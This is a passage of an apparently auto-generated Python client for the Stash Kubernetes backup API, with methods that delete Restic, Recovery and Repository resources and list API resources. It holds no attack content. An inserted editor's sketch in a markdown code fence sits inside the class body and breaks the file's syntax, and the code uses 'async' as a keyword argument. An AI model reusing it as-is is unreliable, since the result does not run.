query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1Status', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_stash_appscode_com_v1alpha1_collection_namespaced_restic(self, namespace, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_collection_namespaced_restic # noqa: E501
delete collection of Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_restic(namespace, async=True)
>>> result = thread.get()
        :param bool async: execute the request asynchronously and return the request thread
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_stash_appscode_com_v1alpha1_collection_namespaced_restic_with_http_info(namespace, **kwargs) # noqa: E501
else:
            data = self.delete_stash_appscode_com_v1alpha1_collection_namespaced_restic_with_http_info(namespace, **kwargs)  # noqa: E501
return data
def delete_stash_appscode_com_v1alpha1_collection_namespaced_restic_with_http_info(self, namespace, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_collection_namespaced_restic # noqa: E501
delete collection of Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_restic_with_http_info(namespace, async=True)
>>> result = thread.get()
        :param bool async: execute the request asynchronously and return the request thread
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: IoK8sApimachineryPkgApisMetaV1Status
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['namespace', 'pretty', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_stash_appscode_com_v1alpha1_collection_namespaced_restic" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `delete_stash_appscode_com_v1alpha1_collection_namespaced_restic`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'namespace' in params:
            path_params['namespace'] = params['namespace'] # noqa: E501

        query_params = []
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty'])) # noqa: E501
        if '_continue' in params:
            query_params.append(('continue', params['_continue'])) # noqa: E501
        if 'field_selector' in params:
            query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
        if 'include_uninitialized' in params:
            query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
        if 'label_selector' in params:
            query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit'])) # noqa: E501
        if 'resource_version' in params:
            query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
        if 'timeout_seconds' in params:
            query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
        if 'watch' in params:
            query_params.append(('watch', params['watch'])) # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['*/*']) # noqa: E501

        # Authentication setting
        auth_settings = [] # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IoK8sApimachineryPkgApisMetaV1Status', # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_stash_appscode_com_v1alpha1_namespaced_recovery(self, name, namespace, body, **kwargs): # noqa: E501
        """delete_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501

        delete a Recovery # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.delete_stash_appscode_com_v1alpha1_namespaced_recovery(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Recovery (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param IoK8sApimachineryPkgApisMetaV1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
        :param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
        :param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
        :return: IoK8sApimachineryPkgApisMetaV1Status
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.delete_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, **kwargs) # noqa: E501
        else:
            (data) = self.delete_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, **kwargs) # noqa: E501
            return data
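    # NOTE (editor's sketch): every generated method in this class validates its
    # **kwargs the same way: collect the allowed names into `all_params`, reject
    # anything else with a TypeError, then check required parameters for None.
    # The stand-in below is a minimal, self-contained sketch of that pattern;
    # `delete_recovery` is hypothetical and not part of the generated client
    # (which also iterates with six.iteritems for py2/py3 compatibility).

```python
def delete_recovery(name, namespace, body, **kwargs):
    """Hypothetical stand-in mirroring the generated kwargs validation."""
    all_params = ['name', 'namespace', 'body', 'pretty',
                  'grace_period_seconds', 'orphan_dependents',
                  'propagation_policy']
    params = {'name': name, 'namespace': namespace, 'body': body}
    for key, val in kwargs.items():  # the real client uses six.iteritems
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_recovery" % key)
        params[key] = val
    # required parameters must not be None, mirroring the generated checks
    for required in ('name', 'namespace', 'body'):
        if params[required] is None:
            raise ValueError(
                "Missing the required parameter `%s`" % required)
    return params
```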

    def delete_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
        """delete_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501

        delete a Recovery # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.delete_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Recovery (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param IoK8sApimachineryPkgApisMetaV1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
        :param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
        :param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
        :return: IoK8sApimachineryPkgApisMetaV1Status
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy'] # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_stash_appscode_com_v1alpha1_namespaced_recovery" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `delete_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `delete_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `delete_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name'] # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace'] # noqa: E501

        query_params = []
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty'])) # noqa: E501
        if 'grace_period_seconds' in params:
            query_params.append(('gracePeriodSeconds', params['grace_period_seconds'])) # noqa: E501
        if 'orphan_dependents' in params:
            query_params.append(('orphanDependents', params['orphan_dependents'])) # noqa: E501
        if 'propagation_policy' in params:
            query_params.append(('propagationPolicy', params['propagation_policy'])) # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['*/*']) # noqa: E501

        # Authentication setting
        auth_settings = [] # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries/{name}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IoK8sApimachineryPkgApisMetaV1Status', # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_stash_appscode_com_v1alpha1_namespaced_repository(self, name, namespace, body, **kwargs): # noqa: E501
        """delete_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501

        delete a Repository # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.delete_stash_appscode_com_v1alpha1_namespaced_repository(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Repository (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param IoK8sApimachineryPkgApisMetaV1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
        :param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
        :param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
        :return: IoK8sApimachineryPkgApisMetaV1Status
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.delete_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, **kwargs) # noqa: E501
        else:
            (data) = self.delete_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, **kwargs) # noqa: E501
            return data

    def delete_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
        """delete_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501

        delete a Repository # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.delete_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Repository (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param IoK8sApimachineryPkgApisMetaV1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
        :param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
        :param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
        :return: IoK8sApimachineryPkgApisMetaV1Status
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy'] # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_stash_appscode_com_v1alpha1_namespaced_repository" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `delete_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `delete_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `delete_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name'] # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace'] # noqa: E501

        query_params = []
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty'])) # noqa: E501
        if 'grace_period_seconds' in params:
            query_params.append(('gracePeriodSeconds', params['grace_period_seconds'])) # noqa: E501
        if 'orphan_dependents' in params:
            query_params.append(('orphanDependents', params['orphan_dependents'])) # noqa: E501
        if 'propagation_policy' in params:
            query_params.append(('propagationPolicy', params['propagation_policy'])) # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['*/*']) # noqa: E501

        # Authentication setting
        auth_settings = [] # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories/{name}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IoK8sApimachineryPkgApisMetaV1Status', # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_stash_appscode_com_v1alpha1_namespaced_restic(self, name, namespace, body, **kwargs): # noqa: E501
        """delete_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501

        delete a Restic # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.delete_stash_appscode_com_v1alpha1_namespaced_restic(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Restic (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param IoK8sApimachineryPkgApisMetaV1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
        :param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
        :param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
        :return: IoK8sApimachineryPkgApisMetaV1Status
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.delete_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, **kwargs) # noqa: E501
        else:
            (data) = self.delete_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, **kwargs) # noqa: E501
            return data

    def delete_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
        """delete_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501

        delete a Restic # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.delete_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Restic (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param IoK8sApimachineryPkgApisMetaV1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
        :param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
        :param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
        :return: IoK8sApimachineryPkgApisMetaV1Status
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy'] # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_stash_appscode_com_v1alpha1_namespaced_restic" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `delete_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `delete_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `delete_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name'] # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace'] # noqa: E501

        query_params = []
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty'])) # noqa: E501
        if 'grace_period_seconds' in params:
            query_params.append(('gracePeriodSeconds', params['grace_period_seconds'])) # noqa: E501
        if 'orphan_dependents' in params:
            query_params.append(('orphanDependents', params['orphan_dependents'])) # noqa: E501
        if 'propagation_policy' in params:
            query_params.append(('propagationPolicy', params['propagation_policy'])) # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['*/*']) # noqa: E501

        # Authentication setting
        auth_settings = [] # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics/{name}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IoK8sApimachineryPkgApisMetaV1Status', # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_stash_appscode_com_v1alpha1_api_resources(self, **kwargs): # noqa: E501
        """get_stash_appscode_com_v1alpha1_api_resources # noqa: E501

        get available resources # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.get_stash_appscode_com_v1alpha1_api_resources(async=True)
        >>> result = thread.get()

        :param async bool
        :return: IoK8sApimachineryPkgApisMetaV1APIResourceList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.get_stash_appscode_com_v1alpha1_api_resources_with_http_info(**kwargs) # noqa: E501
        else:
            (data) = self.get_stash_appscode_com_v1alpha1_api_resources_with_http_info(**kwargs) # noqa: E501
            return data

    def get_stash_appscode_com_v1alpha1_api_resources_with_http_info(self, **kwargs): # noqa: E501
        """get_stash_appscode_com_v1alpha1_api_resources # noqa: E501

        get available resources # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.get_stash_appscode_com_v1alpha1_api_resources_with_http_info(async=True)
        >>> result = thread.get()

        :param async bool
        :return: IoK8sApimachineryPkgApisMetaV1APIResourceList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = [] # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_stash_appscode_com_v1alpha1_api_resources" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
